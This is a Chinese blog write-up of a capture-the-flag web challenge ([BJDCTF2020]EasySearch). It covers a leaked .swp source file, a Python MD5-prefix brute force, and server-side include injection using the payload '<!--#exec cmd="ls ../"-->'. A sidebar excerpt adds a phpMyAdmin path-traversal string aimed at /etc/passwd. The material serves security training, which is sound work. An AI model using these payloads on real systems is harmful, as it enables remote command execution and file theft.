NO.2-30 [BJDCTF2020]EasySearch

最新推荐文章于 2023-12-10 08:15:00 发布
最新推荐文章于 2023-12-10 08:15:00 发布
阅读量121 收藏
点赞数
分类专栏: BUUCTF
原文链接:https://blog.csdn.net/SopRomeo/article/details/105225341
版权

在这里插入图片描述
sql注入没回显,扫描一下后台,最后用御剑扫描到了index.php.swp

进去是一段源代码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

 在这里插入图片描述
这一段简单,用python跑出MD5加密前面是6d0bc1的密文

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

 

在这里插入图片描述

输入后抓包
在这里插入图片描述
发现隐藏了一个url,


在这里插入图片描述
进去之后是这样的,蒙圈了,看了web才知道,唉
根据他的后缀是shtml,搜索漏洞
并且他输出了用户名的名字

得知
ssi注入漏洞
漏洞参考文献
可以远程命令执行

看看他服务器是什么
在这里插入图片描述
flag并不在根目录下

payload:

<!--#exec cmd="ls ../"-->

查看下面的flag文件即可

 

 

nigo134
关注
专栏目录
No .egg-info directory found in xxx\pip-pip-egg-info-mq
猿小白的博客
07-18 7606
No .egg-info directory found in xxx\pip-pip-egg-info-mq
[BJDCTF2020]EasySearch之SSI注入
sGanYu
11-24 2520
开启靶机,题目提示easysearch,应该不是考SQL注入类型的题,然后利用御剑扫出了隐藏文件/index.php.swp,这个文件是一个临时交换文件,用来备份缓冲区中的内容。如果文件正常退出,则自动删除此文件 访问获得源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'..
BUU刷题记9
Kanyun的博客
08-23 404
SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令。拓展:使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 3003
buuctf 源码泄露 ssi远程命令执行漏洞
[BJDCTF2020]EasySearch 1
weixin_53150482的博客
07-23 503
[BJDCTF2020]EasySearch 1
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2791
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
lscat cnindex php,BJDCTF2020--web-复现
weixin_35523284的博客
03-17 369
BJDCTF2020未完待续BuuZJCTF,就这?看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。BUU上和源题好像有点差别。进题放出源码:".file_get_contents($text,'r')."";if(preg_match("/flag/",$file)){die("Not now!");}include($file); //next.php}else{...
题目总结 web 51-100
羽的博客
04-28 4137
0x051 [BJDCTF2020]Mark loves cat 知识点: a=b&c=d foreach($_POST as $x => $y){ echo $x; echo "</br>"; echo $y; echo "</br>"; } 将输出 a b c d 0x052[BJDCTF 2nd]Schrödinger 修改...
BUUCTF(10.25-11.1)
XINO
11-23 4171
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
【web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 2121
ctf_BUUCTF_web
Unrecognized configuration class <class ‘transformers_modules.chatglm2-6b.configuration_chatglm.解决方案
热门推荐
weixin_43178406的博客
12-10 5万+
本文主要介绍了Unrecognized configuration class for this kind of AutoModel: AutoModelForCausalLM.解决方案,希望能对使用chatglm的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
安装CDH出现file /opt/cloudera/parcels/.flood/CDH-6.2.0-1.cdh6.2.0.p0.967373-el7.parcel...does not exist
黄智霖的博客
05-22 1万+
使用Cloudera Manager采取parcel方式安装CDH的时候,部分agent节点出现异常: Src file /opt/cloudera/parcels/.flood/CDH-6.2.0-1.cdh6.2.0.p0.967373-el7.parcel/CDH-6.2.0-1.cdh6.2.0.p0.967373-el7.parcel does not exist 查看对应age...
嵌入式-优质嵌入式项目之低功耗STM32F411开发板设计-原理图+PCB源文件+例程+驱动.zip
10-16
嵌入式_优质嵌入式项目之低功耗STM32F411开发板设计_原理图+PCB源文件+例程+驱动
毕业设计论文Hadoop+Django+Hive+Vue气象数据分析可视化大屏系统.docx
10-16
毕业设计论文
山东大学软件学院系统安全名词解释+大题复习总结
最新发布
10-16
lfb老师大三上的网安限选课,自己整理总结名词解释和大题,熟练背诵基本可得高分
重现Jun的FOC项目-FOC无刷电机.zip
10-16
重现Jun的FOC项目-FOC无刷电机
基于Spring Boot+Dubbo+Nacos+MyBatis加注解方法实现微服务调用的种子项目,用于快速构建A.zip
10-16
基于Spring Boot+Dubbo+Nacos+MyBatis加注解方法实现微服务调用的种子项目,用于快速构建A
基于MATLAB车牌识别技术实现面板GUI.zip
10-16
旅行商问题
毕业设计论文Django+Vue学生综合素质测评系统.docx
10-16
毕业设计论文
csa c22.2 no. 223-15 (2020)
05-13
CSA C22.2 No. 223-15 (2020)是指在加拿大制定的一个标准,主要用于评估太阳能发电系统和设备的安全性能。这个标准规定了太阳能电池组、电缆、逆变器、充电器、电池等太阳能系统中的重要组件的设计和建造标准,同时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值